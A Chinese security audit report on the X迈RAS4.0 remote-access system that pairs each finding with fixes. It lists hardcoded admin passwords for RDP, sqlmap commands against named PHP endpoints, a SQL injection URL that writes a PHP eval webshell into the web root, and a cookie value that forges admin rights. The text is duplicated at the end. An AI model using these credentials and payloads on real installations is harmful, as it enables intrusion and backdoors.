X迈RAS4.0审计分析
字数 1098 2025-08-05 08:19:01

X迈RAS4.0安全审计分析报告

0x01 硬编码凭证漏洞

漏洞描述

X迈RAS4.0系统在安装过程中会自动创建两个管理员账户,且这些账户使用了硬编码的固定密码:

账户名 密码
RASCOM 1A2b3C4d56.
RAS_admin R1a2b3c4d56.

攻击利用

  • 如果目标系统开启了RDP远程桌面服务,攻击者可以直接使用上述凭证进行登录
  • 无需任何特殊权限或工具,仅需知道这些默认凭证即可

修复建议

  1. 立即修改这两个账户的密码
  2. 如不需要,建议禁用或删除这些默认账户
  3. 实施定期密码轮换策略

0x02 SQL注入漏洞

漏洞详情

系统通过COM组件形式调用SQL语句,且代码中存在多处直接拼接SQL查询的情况,缺乏输入过滤和参数化查询。

具体注入点

1. CmxCheckBind.php

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxCheckBind.php?a=1&b=2&c=3&d=4&from=5" --level 5 --risk 3

2. CmxBindMachine.php

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxBindMachine.php?m=1&b=2&a=3&c=4" --risk 3 --level 5

3. CmxUserMap_1.php

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxUserMap_1.php?a=a&b=b&c=c"

4. CmxGetLoginType.php

可利用此端点进行文件写入:

http://10.100.100.133:8088/Server/CmxGetLoginType.php?a=admin%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FProgram%20Files%20%28x86%29%2FComexe%2FRasMini%2Frasweb%2FApache2%2Fhtdocs%2Fsmarty-2.6.19%2FServer%2Faa.php%27%20LINES%20TERMINATED%20BY/**/0x3C3F70687020406576616C28245F504F53545B2758275D293B3F3E--%20-

漏洞特征

  • 几乎所有与数据库交互的接口都存在注入风险
  • 攻击者可利用这些注入点获取数据库敏感信息、执行命令或写入webshell

修复建议

  1. 对所有用户输入进行严格过滤和验证
  2. 使用参数化查询或预编译语句
  3. 实施最小权限原则,限制数据库账户权限
  4. 部署WAF进行防护

0x03 越权漏洞

漏洞描述

系统存在会话伪造漏洞,攻击者可通过简单修改Cookie值提升权限。

攻击方法

在Cookie中添加:

RAS_Admin_UserInfo_UserName=admin

即可获得管理员权限。

漏洞原理

  • 系统仅通过Cookie中的用户名字段判断用户身份
  • 缺乏有效的会话验证机制

修复建议

  1. 实现基于令牌的会话管理
  2. 服务器端验证用户权限
  3. 使用加密签名保护会话信息
  4. 记录并监控异常权限提升行为

0x04 影响范围

受影响版本

X迈RAS4.0及可能更早版本

潜在风险

  • 系统完全控制权被获取
  • 敏感数据泄露
  • 服务器被植入后门
  • 内网横向移动

综合防护措施

  1. 紧急措施

    • 修改所有默认凭证
    • 限制RDP访问
    • 更新系统补丁

  2. 长期措施

    • 实施安全开发生命周期(SDL)
    • 定期安全审计
    • 部署入侵检测系统

  3. 监控措施

    • 日志集中收集和分析
    • 异常行为监控
    • 定期漏洞扫描

附录:测试工具与方法

  1. SQL注入测试

    • 使用sqlmap工具进行自动化测试
    • 手工测试验证注入点

  2. 权限测试

    • 使用Burp Suite修改Cookie值
    • 验证权限提升可能性

  3. 凭证测试

    • 尝试使用默认凭证登录RDP
    • 尝试使用默认凭证访问管理后台
X迈RAS4.0安全审计分析报告 0x01 硬编码凭证漏洞 漏洞描述 X迈RAS4.0系统在安装过程中会自动创建两个管理员账户,且这些账户使用了硬编码的固定密码: | 账户名 | 密码 | |------------|--------------| | RASCOM | 1A2b3C4d56. | | RAS_ admin | R1a2b3c4d56. | 攻击利用 如果目标系统开启了RDP远程桌面服务,攻击者可以直接使用上述凭证进行登录 无需任何特殊权限或工具,仅需知道这些默认凭证即可 修复建议 立即修改这两个账户的密码 如不需要,建议禁用或删除这些默认账户 实施定期密码轮换策略 0x02 SQL注入漏洞 漏洞详情 系统通过COM组件形式调用SQL语句,且代码中存在多处直接拼接SQL查询的情况,缺乏输入过滤和参数化查询。 具体注入点 1. CmxCheckBind.php 2. CmxBindMachine.php 3. CmxUserMap_ 1.php 4. CmxGetLoginType.php 可利用此端点进行文件写入: 漏洞特征 几乎所有与数据库交互的接口都存在注入风险 攻击者可利用这些注入点获取数据库敏感信息、执行命令或写入webshell 修复建议 对所有用户输入进行严格过滤和验证 使用参数化查询或预编译语句 实施最小权限原则,限制数据库账户权限 部署WAF进行防护 0x03 越权漏洞 漏洞描述 系统存在会话伪造漏洞,攻击者可通过简单修改Cookie值提升权限。 攻击方法 在Cookie中添加: 即可获得管理员权限。 漏洞原理 系统仅通过Cookie中的用户名字段判断用户身份 缺乏有效的会话验证机制 修复建议 实现基于令牌的会话管理 服务器端验证用户权限 使用加密签名保护会话信息 记录并监控异常权限提升行为 0x04 影响范围 受影响版本 X迈RAS4.0及可能更早版本 潜在风险 系统完全控制权被获取 敏感数据泄露 服务器被植入后门 内网横向移动 综合防护措施 紧急措施 : 修改所有默认凭证 限制RDP访问 更新系统补丁 长期措施 : 实施安全开发生命周期(SDL) 定期安全审计 部署入侵检测系统 监控措施 : 日志集中收集和分析 异常行为监控 定期漏洞扫描 附录:测试工具与方法 SQL注入测试 : 使用sqlmap工具进行自动化测试 手工测试验证注入点 权限测试 : 使用Burp Suite修改Cookie值 验证权限提升可能性 凭证测试 : 尝试使用默认凭证登录RDP 尝试使用默认凭证访问管理后台